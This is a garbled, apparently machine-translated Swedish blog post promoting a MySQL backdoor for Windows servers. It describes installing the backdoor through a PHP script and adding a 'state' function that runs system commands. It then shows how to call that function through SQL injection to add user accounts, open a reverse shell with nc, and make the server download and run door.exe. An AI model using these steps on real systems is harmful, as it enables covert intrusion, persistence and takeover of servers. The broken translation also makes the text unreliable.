Mysql BackDoor
Källa: Puri Manchester
MySQL BackDoor var en bakdörr för att utveckla PHP + MySQL-server för MySQL efter bakdörren för att installera lägga till "stat"-funktionen kan köra systemet kommandon och starta med MySQL som bygger på Dll sniffer porttyp tillbaka, skickligt förstod ingen port, ingen process, inga tjänster genom väggen trojan. program i WinXP WIN2003 + MYSQL5.0.X, och under passet.
Installationen Mysql.php spridit sig till PHP-servern, enligt fylla i Host-user-password-DB, klicka på "auto-install Mysql bakdörr"
Efter en lyckad installation, skulle Mysql ökas med ett "tillstånd"-funktion, medan Mysql processen kör en sniffa bakvägen av denna bakdörr i Windows har samma system privilegier och Mysql.
Användningen av statliga funktioner
State-funktionen är faktiskt en PHP system () "-funktion samma funktion kan användas för att exekvera systemkommandon Ange SQL-kommandot." Office och fyll i mysql uttalande utföras, till exempel "väljer staten (" nätet användaren nohack / add "), klicka på" Kör SQL-satser körs resultat.
Med staten funktion baserad Sniff bakdörren, även om webshell förlorade, så länge som server, SQL injection punkt kan vi genom injektion. Php? Id = 1 och tillstånd ("net user ')" metoden körs på servern .? Kommandot Men om injektionen punkten är det inte vi kallar fortfarande Sniff baksidan servern dörren kontrollen skickas till alla hamnar på servern och öppna till MySQL-"i början av paketet, kommer att kunna ringa Sniff bakdörren, till exempel.:
Ett fungerande system kommando: för NC ip 80 -> Enter -> mysql-cmd / c nätet användaren abc / add> C :/ log.txt, (Obs: "!" Det sista kan inte utelämnas)
2 20.082 port av skalet till den lokala servern Bounce: för det första körningen av NC-LP 20 082 för att övervaka maskinens 20.082 port, och sedan av NC IP 80 -> Enter -> mysql-c -> Ange
Låt server ladda ned: av NC ip 80 -> Enter -> mysql-http :/ / www.x.com i / door.exe-c mydoor.exe (OBS: Sista "Kan inte utelämnas)
Förutom att skicka "mysql-c-", är den andra kommandot inget eko, men motsvarande kommandon på servern igång.
Avinstallera MySQL på flykt "drop-funktionen state" kan lossas, men samtidigt gör att MySQL-processen för att avsluta, återgå till det normala efter omstart.










































154 Trackback (er)
Du måste vara inloggad för att skriva en kommentar.